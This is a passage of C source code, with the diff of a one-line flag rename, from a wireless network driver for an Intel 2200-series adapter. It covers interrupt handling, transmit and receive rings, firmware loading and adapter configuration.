(beacon->state == IWI_BEACON_MISS) { /* * The firmware notifies us of every beacon miss * so we need to track the count against the * configured threshold before notifying the * 802.11 layer. * XXX try to roam, drop assoc only on much higher count */ if (le32toh(beacon->number) >= vap->iv_bmissthreshold) { DPRINTF(("Beacon miss: %u >= %u\n", le32toh(beacon->number), vap->iv_bmissthreshold)); vap->iv_stats.is_beacon_miss++; /* * It's pointless to notify the 802.11 layer * as it'll try to send a probe request (which * we'll discard) and then timeout and drop us * into scan state. Instead tell the firmware * to disassociate and then on completion we'll * kick the state machine to scan. */ ieee80211_runtask(ic, &sc->sc_disassoctask); } } break; case IWI_NOTIF_TYPE_CALIBRATION: case IWI_NOTIF_TYPE_NOISE: case IWI_NOTIF_TYPE_LINK_QUALITY: DPRINTFN(5, ("Notification (%u)\n", notif->type)); break; default: DPRINTF(("unknown notification type %u flags 0x%x len %u\n", notif->type, notif->flags, le16toh(notif->len))); break; } } static void iwi_rx_intr(struct iwi_softc *sc) { struct iwi_rx_data *data; struct iwi_hdr *hdr; uint32_t hw; hw = CSR_READ_4(sc, IWI_CSR_RX_RIDX); for (; sc->rxq.cur != hw;) { data = &sc->rxq.data[sc->rxq.cur]; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); hdr = mtod(data->m, struct iwi_hdr *); switch (hdr->type) { case IWI_HDR_TYPE_FRAME: iwi_frame_intr(sc, data, sc->rxq.cur, (struct iwi_frame *)(hdr + 1)); break; case IWI_HDR_TYPE_NOTIF: iwi_notification_intr(sc, (struct iwi_notif *)(hdr + 1)); break; default: device_printf(sc->sc_dev, "unknown hdr type %u\n", hdr->type); } DPRINTFN(15, ("rx done idx=%u\n", sc->rxq.cur)); sc->rxq.cur = (sc->rxq.cur + 1) % IWI_RX_RING_COUNT; } /* tell the firmware what we have processed */ hw = (hw == 0) ? IWI_RX_RING_COUNT - 1 : hw - 1; CSR_WRITE_4(sc, IWI_CSR_RX_WIDX, hw); } static void iwi_tx_intr(struct iwi_softc *sc, struct iwi_tx_ring *txq) { struct ifnet *ifp = sc->sc_ifp; struct iwi_tx_data *data; uint32_t hw; hw = CSR_READ_4(sc, txq->csr_ridx); for (; txq->next != hw;) { data = &txq->data[txq->next]; bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(txq->data_dmat, data->map); if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, 0/*XXX*/); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; DPRINTFN(15, ("tx done idx=%u\n", txq->next)); ifp->if_opackets++; txq->queued--; txq->next = (txq->next + 1) % IWI_TX_RING_COUNT; } sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; if (sc->sc_softled) iwi_led_event(sc, IWI_LED_TX); iwi_start_locked(ifp); } static void iwi_fatal_error_intr(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); device_printf(sc->sc_dev, "firmware error\n"); if (vap != NULL) ieee80211_cancel_scan(vap); ieee80211_runtask(ic, &sc->sc_restarttask); sc->flags &= ~IWI_FLAG_BUSY; sc->sc_busy_timer = 0; wakeup(sc); } static void iwi_radio_off_intr(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_radiofftask); } static void iwi_intr(void *arg) { struct iwi_softc *sc = arg; uint32_t r; IWI_LOCK_DECL; IWI_LOCK(sc); if ((r = CSR_READ_4(sc, IWI_CSR_INTR)) == 0 || r == 0xffffffff) { IWI_UNLOCK(sc); return; } /* acknowledge interrupts */ CSR_WRITE_4(sc, IWI_CSR_INTR, r); if (r & IWI_INTR_FATAL_ERROR) { iwi_fatal_error_intr(sc); goto done; } if (r & IWI_INTR_FW_INITED) { if (!(r & (IWI_INTR_FATAL_ERROR | IWI_INTR_PARITY_ERROR))) wakeup(sc); } if (r & IWI_INTR_RADIO_OFF) iwi_radio_off_intr(sc); if (r & IWI_INTR_CMD_DONE) { sc->flags &= ~IWI_FLAG_BUSY; sc->sc_busy_timer = 0; wakeup(sc); } if (r & IWI_INTR_TX1_DONE) iwi_tx_intr(sc, &sc->txq[0]); if (r & IWI_INTR_TX2_DONE) iwi_tx_intr(sc, &sc->txq[1]); if (r & IWI_INTR_TX3_DONE) iwi_tx_intr(sc, &sc->txq[2]); if (r & IWI_INTR_TX4_DONE) iwi_tx_intr(sc, &sc->txq[3]); if (r & IWI_INTR_RX_DONE) iwi_rx_intr(sc); if (r & IWI_INTR_PARITY_ERROR) { /* XXX rate-limit */ device_printf(sc->sc_dev, "parity error\n"); } done: IWI_UNLOCK(sc); } static int iwi_cmd(struct iwi_softc *sc, uint8_t type, void *data, uint8_t len) { struct iwi_cmd_desc *desc; IWI_LOCK_ASSERT(sc); if (sc->flags & IWI_FLAG_BUSY) { device_printf(sc->sc_dev, "%s: cmd %d not sent, busy\n", __func__, type); return EAGAIN; } sc->flags |= IWI_FLAG_BUSY; sc->sc_busy_timer = 2; desc = &sc->cmdq.desc[sc->cmdq.cur]; desc->hdr.type = IWI_HDR_TYPE_COMMAND; desc->hdr.flags = IWI_HDR_FLAG_IRQ; desc->type = type; desc->len = len; memcpy(desc->data, data, len); bus_dmamap_sync(sc->cmdq.desc_dmat, sc->cmdq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(2, ("sending command idx=%u type=%u len=%u\n", sc->cmdq.cur, type, len)); sc->cmdq.cur = (sc->cmdq.cur + 1) % IWI_CMD_RING_COUNT; CSR_WRITE_4(sc, IWI_CSR_CMD_WIDX, sc->cmdq.cur); return msleep(sc, &sc->sc_mtx, 0, "iwicmd", hz); } static void iwi_write_ibssnode(struct iwi_softc *sc, const u_int8_t addr[IEEE80211_ADDR_LEN], int entry) { struct iwi_ibssnode node; /* write node information into NIC memory */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.bssid, addr); DPRINTF(("%s mac %6D station %u\n", __func__, node.bssid, ":", entry)); CSR_WRITE_REGION_1(sc, IWI_CSR_NODE_BASE + entry * sizeof node, (uint8_t *)&node, sizeof node); } static int iwi_tx_start(struct ifnet *ifp, struct mbuf *m0, struct ieee80211_node *ni, int ac) { struct iwi_softc *sc = ifp->if_softc; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct iwi_node *in = (struct iwi_node *)ni; const struct ieee80211_frame *wh; struct ieee80211_key *k; const struct chanAccParams *cap; struct iwi_tx_ring *txq = &sc->txq[ac]; struct iwi_tx_data *data; struct iwi_tx_desc *desc; struct mbuf *mnew; bus_dma_segment_t segs[IWI_MAX_NSEG]; int error, nsegs, hdrlen, i; int ismcast, flags, xflags, staid; IWI_LOCK_ASSERT(sc); wh = mtod(m0, const struct ieee80211_frame *); /* NB: only data frames use this path */ hdrlen = ieee80211_hdrsize(wh); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); flags = xflags = 0; if (!ismcast) flags |= IWI_DATA_FLAG_NEED_ACK; if (vap->iv_flags & IEEE80211_F_SHPREAMBLE) flags |= IWI_DATA_FLAG_SHPREAMBLE; if (IEEE80211_QOS_HAS_SEQ(wh)) { xflags |= IWI_DATA_XFLAG_QOS; cap = &ic->ic_wme.wme_chanParams; if (!cap->cap_wmeParams[ac].wmep_noackPolicy) flags &= ~IWI_DATA_FLAG_NEED_ACK; } /* * This is only used in IBSS mode where the firmware expect an index * in a h/w table instead of a destination address. */ if (vap->iv_opmode == IEEE80211_M_IBSS) { if (!ismcast) { if (in->in_station == -1) { in->in_station = alloc_unr(sc->sc_unr); if (in->in_station == -1) { /* h/w table is full */ m_freem(m0); ieee80211_free_node(ni); ifp->if_oerrors++; return 0; } iwi_write_ibssnode(sc, ni->ni_macaddr, in->in_station); } staid = in->in_station; } else { /* * Multicast addresses have no associated node * so there will be no station entry. We reserve * entry 0 for one mcast address and use that. * If there are many being used this will be * expensive and we'll need to do a better job * but for now this handles the broadcast case. */ if (!IEEE80211_ADDR_EQ(wh->i_addr1, sc->sc_mcast)) { IEEE80211_ADDR_COPY(sc->sc_mcast, wh->i_addr1); iwi_write_ibssnode(sc, sc->sc_mcast, 0); } staid = 0; } } else staid = 0; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct iwi_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; ieee80211_radiotap_tx(vap, m0); } data = &txq->data[txq->cur]; desc = &txq->desc[txq->cur]; /* save and trim IEEE802.11 header */ m_copydata(m0, 0, hdrlen, (caddr_t)&desc->wh); m_adj(m0, hdrlen); error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(txq->data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } } data->m = m0; data->ni = ni; desc->hdr.type = IWI_HDR_TYPE_DATA; desc->hdr.flags = IWI_HDR_FLAG_IRQ; desc->station = staid; desc->cmd = IWI_DATA_CMD_TX; desc->len = htole16(m0->m_pkthdr.len); desc->flags = flags; desc->xflags = xflags; #if 0 if (vap->iv_flags & IEEE80211_F_PRIVACY) desc->wep_txkey = vap->iv_def_txkey; else #endif desc->flags |= IWI_DATA_FLAG_NO_WEP; desc->nseg = htole32(nsegs); for (i = 0; i < nsegs; i++) { desc->seg_addr[i] = htole32(segs[i].ds_addr); desc->seg_len[i] = htole16(segs[i].ds_len); } bus_dmamap_sync(txq->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(txq->desc_dmat, txq->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(5, ("sending data frame txq=%u idx=%u len=%u nseg=%u\n", ac, txq->cur, le16toh(desc->len), nsegs)); txq->queued++; txq->cur = (txq->cur + 1) % IWI_TX_RING_COUNT; CSR_WRITE_4(sc, txq->csr_widx, txq->cur); return 0; } static int iwi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { /* no support; just discard */ m_freem(m); ieee80211_free_node(ni); return 0; } static void iwi_start_locked(struct ifnet *ifp) { struct iwi_softc *sc = ifp->if_softc; struct mbuf *m; struct ieee80211_node *ni; int ac; IWI_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ac = M_WME_GETAC(m); if (sc->txq[ac].queued > IWI_TX_RING_COUNT - 8) { /* there is no place left in this ring; tail drop */ /* XXX tail drop */ IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (iwi_tx_start(ifp, m, ni, ac) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static void iwi_start(struct ifnet *ifp) { struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); iwi_start_locked(ifp); IWI_UNLOCK(sc); } static void iwi_watchdog(void *arg) { struct iwi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWI_LOCK_ASSERT(sc); if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; ieee80211_runtask(ic, &sc->sc_restarttask); } } if (sc->sc_state_timer > 0) { if (--sc->sc_state_timer == 0) { if_printf(ifp, "firmware stuck in state %d, resetting\n", sc->fw_state); if (sc->fw_state == IWI_FW_SCANNING) { struct ieee80211com *ic = ifp->if_l2com; ieee80211_cancel_scan(TAILQ_FIRST(&ic->ic_vaps)); } ieee80211_runtask(ic, &sc->sc_restarttask); sc->sc_state_timer = 3; } } if (sc->sc_busy_timer > 0) { if (--sc->sc_busy_timer == 0) { if_printf(ifp, "firmware command timeout, resetting\n"); ieee80211_runtask(ic, &sc->sc_restarttask); } } callout_reset(&sc->sc_wdtimer, hz, iwi_watchdog, sc); } static int iwi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct iwi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; IWI_LOCK_DECL; switch (cmd) { case SIOCSIFFLAGS: IWI_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { iwi_init_locked(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) iwi_stop_locked(sc); } IWI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void iwi_stop_master(struct iwi_softc *sc) { uint32_t tmp; int ntries; /* disable interrupts */ CSR_WRITE_4(sc, IWI_CSR_INTR_MASK, 0); CSR_WRITE_4(sc, IWI_CSR_RST, IWI_RST_STOP_MASTER); for (ntries = 0; ntries < 5; ntries++) { if (CSR_READ_4(sc, IWI_CSR_RST) & IWI_RST_MASTER_DISABLED) break; DELAY(10); } if (ntries == 5) device_printf(sc->sc_dev, "timeout waiting for master\n"); tmp = CSR_READ_4(sc, IWI_CSR_RST); CSR_WRITE_4(sc, IWI_CSR_RST, tmp | IWI_RST_PRINCETON_RESET); sc->flags &= ~IWI_FLAG_FW_INITED; } static int iwi_reset(struct iwi_softc *sc) { uint32_t tmp; int i, ntries; iwi_stop_master(sc); tmp = CSR_READ_4(sc, IWI_CSR_CTL); CSR_WRITE_4(sc, IWI_CSR_CTL, tmp | IWI_CTL_INIT); CSR_WRITE_4(sc, IWI_CSR_READ_INT, IWI_READ_INT_INIT_HOST); /* wait for clock stabilization */ for (ntries = 0; ntries < 1000; ntries++) { if (CSR_READ_4(sc, IWI_CSR_CTL) & IWI_CTL_CLOCK_READY) break; DELAY(200); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for clock stabilization\n"); return EIO; } tmp = CSR_READ_4(sc, IWI_CSR_RST); CSR_WRITE_4(sc, IWI_CSR_RST, tmp | IWI_RST_SOFT_RESET); DELAY(10); tmp = CSR_READ_4(sc, IWI_CSR_CTL); CSR_WRITE_4(sc, IWI_CSR_CTL, tmp | IWI_CTL_INIT); /* clear NIC memory */ CSR_WRITE_4(sc, IWI_CSR_AUTOINC_ADDR, 0); for (i = 0; i < 0xc000; i++) CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, 0); return 0; } static const struct iwi_firmware_ohdr * iwi_setup_ofw(struct iwi_softc *sc, struct iwi_fw *fw) { const struct firmware *fp = fw->fp; const struct iwi_firmware_ohdr *hdr; if (fp->datasize < sizeof (struct iwi_firmware_ohdr)) { device_printf(sc->sc_dev, "image '%s' too small\n", fp->name); return NULL; } hdr = (const struct iwi_firmware_ohdr *)fp->data; if ((IWI_FW_GET_MAJOR(le32toh(hdr->version)) != IWI_FW_REQ_MAJOR) || (IWI_FW_GET_MINOR(le32toh(hdr->version)) != IWI_FW_REQ_MINOR)) { device_printf(sc->sc_dev, "version for '%s' %d.%d != %d.%d\n", fp->name, IWI_FW_GET_MAJOR(le32toh(hdr->version)), IWI_FW_GET_MINOR(le32toh(hdr->version)), IWI_FW_REQ_MAJOR, IWI_FW_REQ_MINOR); return NULL; } fw->data = ((const char *) fp->data) + sizeof(struct iwi_firmware_ohdr); fw->size = fp->datasize - sizeof(struct iwi_firmware_ohdr); fw->name = fp->name; return hdr; } static const struct iwi_firmware_ohdr * iwi_setup_oucode(struct iwi_softc *sc, struct iwi_fw *fw) { const struct iwi_firmware_ohdr *hdr; hdr = iwi_setup_ofw(sc, fw); if (hdr != NULL && le32toh(hdr->mode) != IWI_FW_MODE_UCODE) { device_printf(sc->sc_dev, "%s is not a ucode image\n", fw->name); hdr = NULL; } return hdr; } static void iwi_getfw(struct iwi_fw *fw, const char *fwname, struct iwi_fw *uc, const char *ucname) { if (fw->fp == NULL) fw->fp = firmware_get(fwname); /* NB: pre-3.0 ucode is packaged separately */ if (uc->fp == NULL && fw->fp != NULL && fw->fp->version < 300) uc->fp = firmware_get(ucname); } /* * Get the required firmware images if not already loaded. * Note that we hold firmware images so long as the device * is marked up in case we need to reload them on device init. * This is necessary because we re-init the device sometimes * from a context where we cannot read from the filesystem * (e.g. from the taskqueue thread when rfkill is re-enabled). * XXX return 0 on success, 1 on error. * * NB: the order of get'ing and put'ing images here is * intentional to support handling firmware images bundled * by operating mode and/or all together in one file with * the boot firmware as "master". */ static int iwi_get_firmware(struct iwi_softc *sc, enum ieee80211_opmode opmode) { const struct iwi_firmware_hdr *hdr; const struct firmware *fp; /* invalidate cached firmware on mode change */ if (sc->fw_mode != opmode) iwi_put_firmware(sc); switch (opmode) { case IEEE80211_M_STA: iwi_getfw(&sc->fw_fw, "iwi_bss", &sc->fw_uc, "iwi_ucode_bss"); break; case IEEE80211_M_IBSS: iwi_getfw(&sc->fw_fw, "iwi_ibss", &sc->fw_uc, "iwi_ucode_ibss"); break; case IEEE80211_M_MONITOR: iwi_getfw(&sc->fw_fw, "iwi_monitor", &sc->fw_uc, "iwi_ucode_monitor"); break; default: device_printf(sc->sc_dev, "unknown opmode %d\n", opmode); return EINVAL; } fp = sc->fw_fw.fp; if (fp == NULL) { device_printf(sc->sc_dev, "could not load firmware\n"); goto bad; } if (fp->version < 300) { /* * Firmware prior to 3.0 was packaged as separate * boot, firmware, and ucode images. Verify the * ucode image was read in, retrieve the boot image * if needed, and check version stamps for consistency. * The version stamps in the data are also checked * above; this is a bit paranoid but is a cheap * safeguard against mis-packaging. */ if (sc->fw_uc.fp == NULL) { device_printf(sc->sc_dev, "could not load ucode\n"); goto bad; } if (sc->fw_boot.fp == NULL) { sc->fw_boot.fp = firmware_get("iwi_boot"); if (sc->fw_boot.fp == NULL) { device_printf(sc->sc_dev, "could not load boot firmware\n"); goto bad; } } if (sc->fw_boot.fp->version != sc->fw_fw.fp->version || sc->fw_boot.fp->version != sc->fw_uc.fp->version) { device_printf(sc->sc_dev, "firmware version mismatch: " "'%s' is %d, '%s' is %d, '%s' is %d\n", sc->fw_boot.fp->name, sc->fw_boot.fp->version, sc->fw_uc.fp->name, sc->fw_uc.fp->version, sc->fw_fw.fp->name, sc->fw_fw.fp->version ); goto bad; } /* * Check and setup each image. */ if (iwi_setup_oucode(sc, &sc->fw_uc) == NULL || iwi_setup_ofw(sc, &sc->fw_boot) == NULL || iwi_setup_ofw(sc, &sc->fw_fw) == NULL) goto bad; } else { /* * Check and setup combined image. */ if (fp->datasize < sizeof(struct iwi_firmware_hdr)) { device_printf(sc->sc_dev, "image '%s' too small\n", fp->name); goto bad; } hdr = (const struct iwi_firmware_hdr *)fp->data; if (fp->datasize < sizeof(*hdr) + le32toh(hdr->bsize) + le32toh(hdr->usize) + le32toh(hdr->fsize)) { device_printf(sc->sc_dev, "image '%s' too small (2)\n", fp->name); goto bad; } sc->fw_boot.data = ((const char *) fp->data) + sizeof(*hdr); sc->fw_boot.size = le32toh(hdr->bsize); sc->fw_boot.name = fp->name; sc->fw_uc.data = sc->fw_boot.data + sc->fw_boot.size; sc->fw_uc.size = le32toh(hdr->usize); sc->fw_uc.name = fp->name; sc->fw_fw.data = sc->fw_uc.data + sc->fw_uc.size; sc->fw_fw.size = le32toh(hdr->fsize); sc->fw_fw.name = fp->name; } #if 0 device_printf(sc->sc_dev, "boot %d ucode %d fw %d bytes\n", sc->fw_boot.size, sc->fw_uc.size, sc->fw_fw.size); #endif sc->fw_mode = opmode; return 0; bad: iwi_put_firmware(sc); return 1; } static void iwi_put_fw(struct iwi_fw *fw) { if (fw->fp != NULL) { firmware_put(fw->fp, FIRMWARE_UNLOAD); fw->fp = NULL; } fw->data = NULL; fw->size = 0; fw->name = NULL; } /* * Release any cached firmware images. */ static void iwi_put_firmware(struct iwi_softc *sc) { iwi_put_fw(&sc->fw_uc); iwi_put_fw(&sc->fw_fw); iwi_put_fw(&sc->fw_boot); } static int iwi_load_ucode(struct iwi_softc *sc, const struct iwi_fw *fw) { uint32_t tmp; const uint16_t *w; const char *uc = fw->data; size_t size = fw->size; int i, ntries, error; IWI_LOCK_ASSERT(sc); error = 0; CSR_WRITE_4(sc, IWI_CSR_RST, CSR_READ_4(sc, IWI_CSR_RST) | IWI_RST_STOP_MASTER); for (ntries = 0; ntries < 5; ntries++) { if (CSR_READ_4(sc, IWI_CSR_RST) & IWI_RST_MASTER_DISABLED) break; DELAY(10); } if (ntries == 5) { device_printf(sc->sc_dev, "timeout waiting for master\n"); error = EIO; goto fail; } MEM_WRITE_4(sc, 0x3000e0, 0x80000000); DELAY(5000); tmp = CSR_READ_4(sc, IWI_CSR_RST); tmp &= ~IWI_RST_PRINCETON_RESET; CSR_WRITE_4(sc, IWI_CSR_RST, tmp); DELAY(5000); MEM_WRITE_4(sc, 0x3000e0, 0); DELAY(1000); MEM_WRITE_4(sc, IWI_MEM_EEPROM_EVENT, 1); DELAY(1000); MEM_WRITE_4(sc, IWI_MEM_EEPROM_EVENT, 0); DELAY(1000); MEM_WRITE_1(sc, 0x200000, 0x00); MEM_WRITE_1(sc, 0x200000, 0x40); DELAY(1000); /* write microcode into adapter memory */ for (w = (const uint16_t *)uc; size > 0; w++, size -= 2) MEM_WRITE_2(sc, 0x200010, htole16(*w)); MEM_WRITE_1(sc, 0x200000, 0x00); MEM_WRITE_1(sc, 0x200000, 0x80); /* wait until we get an answer */ for (ntries = 0; ntries < 100; ntries++) { if (MEM_READ_1(sc, 0x200000) & 1) break; DELAY(100); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for ucode to initialize\n"); error = EIO; goto fail; } /* read the answer or the firmware will not initialize properly */ for (i = 0; i < 7; i++) MEM_READ_4(sc, 0x200004); MEM_WRITE_1(sc, 0x200000, 0x00); fail: return error; } /* macro to handle unaligned little endian data in firmware image */ #define GETLE32(p) ((p)[0] | (p)[1] << 8 | (p)[2] << 16 | (p)[3] << 24) static int iwi_load_firmware(struct iwi_softc *sc, const struct iwi_fw *fw) { u_char *p, *end; uint32_t sentinel, ctl, src, dst, sum, len, mlen, tmp; int ntries, error; IWI_LOCK_ASSERT(sc); /* copy firmware image to DMA memory */ memcpy(sc->fw_virtaddr, fw->data, fw->size); /* make sure the adapter will get up-to-date values */ bus_dmamap_sync(sc->fw_dmat, sc->fw_map, BUS_DMASYNC_PREWRITE); /* tell the adapter where the command blocks are stored */ MEM_WRITE_4(sc, 0x3000a0, 0x27000); /* * Store command blocks into adapter's internal memory using register * indirections. The adapter will read the firmware image through DMA * using information stored in command blocks. */ src = sc->fw_physaddr; p = sc->fw_virtaddr; end = p + fw->size; CSR_WRITE_4(sc, IWI_CSR_AUTOINC_ADDR, 0x27000); while (p < end) { dst = GETLE32(p); p += 4; src += 4; len = GETLE32(p); p += 4; src += 4; p += len; while (len > 0) { mlen = min(len, IWI_CB_MAXDATALEN); ctl = IWI_CB_DEFAULT_CTL | mlen; sum = ctl ^ src ^ dst; /* write a command block */ CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, ctl); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, src); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, dst); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, sum); src += mlen; dst += mlen; len -= mlen; } } /* write a fictive final command block (sentinel) */ sentinel = CSR_READ_4(sc, IWI_CSR_AUTOINC_ADDR); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, 0); tmp = CSR_READ_4(sc, IWI_CSR_RST); tmp &= ~(IWI_RST_MASTER_DISABLED | IWI_RST_STOP_MASTER); CSR_WRITE_4(sc, IWI_CSR_RST, tmp); /* tell the adapter to start processing command blocks */ MEM_WRITE_4(sc, 0x3000a4, 0x540100); /* wait until the adapter reaches the sentinel */ for (ntries = 0; ntries < 400; ntries++) { if (MEM_READ_4(sc, 0x3000d0) >= sentinel) break; DELAY(100); } /* sync dma, just in case */ bus_dmamap_sync(sc->fw_dmat, sc->fw_map, BUS_DMASYNC_POSTWRITE); if (ntries == 400) { device_printf(sc->sc_dev, "timeout processing command blocks for %s firmware\n", fw->name); return EIO; } /* we're done with command blocks processing */ MEM_WRITE_4(sc, 0x3000a4, 0x540c00); /* allow interrupts so we know when the firmware is ready */ CSR_WRITE_4(sc, IWI_CSR_INTR_MASK, IWI_INTR_MASK); /* tell the adapter to initialize the firmware */ CSR_WRITE_4(sc, IWI_CSR_RST, 0); tmp = CSR_READ_4(sc, IWI_CSR_CTL); CSR_WRITE_4(sc, IWI_CSR_CTL, tmp | IWI_CTL_ALLOW_STANDBY); /* wait at most one second for firmware initialization to complete */ if ((error = msleep(sc, &sc->sc_mtx, 0, "iwiinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for %s firmware " "initialization to complete\n", fw->name); } return error; } static int iwi_setpowermode(struct iwi_softc *sc, struct ieee80211vap *vap) { uint32_t data; if (vap->iv_flags & IEEE80211_F_PMGTON) { /* XXX set more fine-grained operation */ data = htole32(IWI_POWER_MODE_MAX); } else data = htole32(IWI_POWER_MODE_CAM); DPRINTF(("Setting power mode to %u\n", le32toh(data))); return iwi_cmd(sc, IWI_CMD_SET_POWER_MODE, &data, sizeof data); } static int iwi_setwepkeys(struct iwi_softc *sc, struct ieee80211vap *vap) { struct iwi_wep_key wepkey; struct ieee80211_key *wk; int error, i; for (i = 0; i < IEEE80211_WEP_NKID; i++) { wk = &vap->iv_nw_keys[i]; wepkey.cmd = IWI_WEP_KEY_CMD_SETKEY; wepkey.idx = i; wepkey.len = wk->wk_keylen; memset(wepkey.key, 0, sizeof wepkey.key); memcpy(wepkey.key, wk->wk_key, wk->wk_keylen); DPRINTF(("Setting wep key index %u len %u\n", wepkey.idx, wepkey.len)); error = iwi_cmd(sc, IWI_CMD_SET_WEP_KEY, &wepkey, sizeof wepkey); if (error != 0) return error; } return 0; } static int iwi_config(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwi_configuration config; struct iwi_rateset rs; struct iwi_txpower power; uint32_t data; int error, i; IWI_LOCK_ASSERT(sc); DPRINTF(("Setting MAC address to %6D\n", IF_LLADDR(ifp), ":")); error = iwi_cmd(sc, IWI_CMD_SET_MAC_ADDRESS, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); if (error != 0) return error; memset(&config, 0, sizeof config); config.bluetooth_coexistence = sc->bluetooth; config.silence_threshold = 0x1e; config.antenna = sc->antenna; config.multicast_enabled = 1; config.answer_pbreq = (ic->ic_opmode == IEEE80211_M_IBSS) ? 1 : 0; config.disable_unicast_decryption = 1; config.disable_multicast_decryption = 1; if (ic->ic_opmode == IEEE80211_M_MONITOR) { config.allow_invalid_frames = 1; config.allow_beacon_and_probe_resp = 1; config.allow_mgt = 1; } DPRINTF(("Configuring adapter\n")); error = iwi_cmd(sc, IWI_CMD_SET_CONFIG, &config, sizeof config); if (error != 0) return error; if (ic->ic_opmode == IEEE80211_M_IBSS) { power.mode = IWI_MODE_11B; power.nchan = 11; for (i = 0; i < 11; i++) { power.chan[i].chan = i + 1; power.chan[i].power = IWI_TXPOWER_MAX; } DPRINTF(("Setting .11b channels tx power\n")); error = iwi_cmd(sc, IWI_CMD_SET_TX_POWER, &power, sizeof power); if (error != 0) return error; power.mode = IWI_MODE_11G; DPRINTF(("Setting .11g channels tx power\n")); error = iwi_cmd(sc, IWI_CMD_SET_TX_POWER, &power, sizeof power); if (error != 0) return error; } memset(&rs, 0, sizeof rs); rs.mode = IWI_MODE_11G; rs.type = IWI_RATESET_TYPE_SUPPORTED; rs.nrates = ic->ic_sup_rates[IEEE80211_MODE_11G].rs_nrates; memcpy(rs.rates, ic->ic_sup_rates[IEEE80211_MODE_11G].rs_rates, rs.nrates); DPRINTF(("Setting .11bg supported rates (%u)\n", rs.nrates)); error = iwi_cmd(sc, IWI_CMD_SET_RATES, &rs, sizeof rs); if (error != 0) return error; memset(&rs, 0, sizeof rs); rs.mode = IWI_MODE_11A; rs.type = IWI_RATESET_TYPE_SUPPORTED; rs.nrates = ic->ic_sup_rates[IEEE80211_MODE_11A].rs_nrates; memcpy(rs.rates, ic->ic_sup_rates[IEEE80211_MODE_11A].rs_rates, rs.nrates); DPRINTF(("Setting .11a supported rates (%u)\n", rs.nrates)); error = iwi_cmd(sc, IWI_CMD_SET_RATES, &rs, sizeof rs); if (error != 0) return error; data = htole32(arc4random()); DPRINTF(("Setting initialization vector to %u\n", le32toh(data))); error = iwi_cmd(sc, IWI_CMD_SET_IV, &data, sizeof data); if (error != 0) return error; /* enable adapter */ DPRINTF(("Enabling adapter\n")); return iwi_cmd(sc, 